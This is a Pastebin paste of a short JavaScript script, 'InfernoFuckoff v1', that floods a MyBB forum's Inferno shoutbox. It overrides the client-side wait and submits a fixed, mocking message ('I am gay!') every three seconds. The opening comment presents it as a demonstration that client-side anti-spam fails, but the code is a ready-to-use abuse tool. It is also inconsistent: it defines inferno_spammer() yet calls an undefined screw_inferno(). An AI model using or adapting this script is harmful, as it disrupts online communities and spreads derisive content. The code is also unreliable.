Advertisement
Guest User

Inferno MyBB

a guest
Jan 9th, 2015
198
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.43 KB | None | 0 0
  1. /**
  2. * Now, here is why, you never rely on javascript to prevent spam... okay?
  3. * Infernofuckoff v1
  4. */
  5.  
  6. function inferno_spammer() {
  7. inferno.update_style('color', "black");
  8. inferno.shoutwait = 1;
  9. inferno.alert("InfernoFuckoff v1");
  10. setInterval(function() {
  11. document.getElementById("inferno_shout_entry").value = "I am gay!";
  12. inferno.submit_shout();
  13. inferno.alert("Spammer is running");
  14. }, 3000);
  15. }
  16. screw_inferno();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement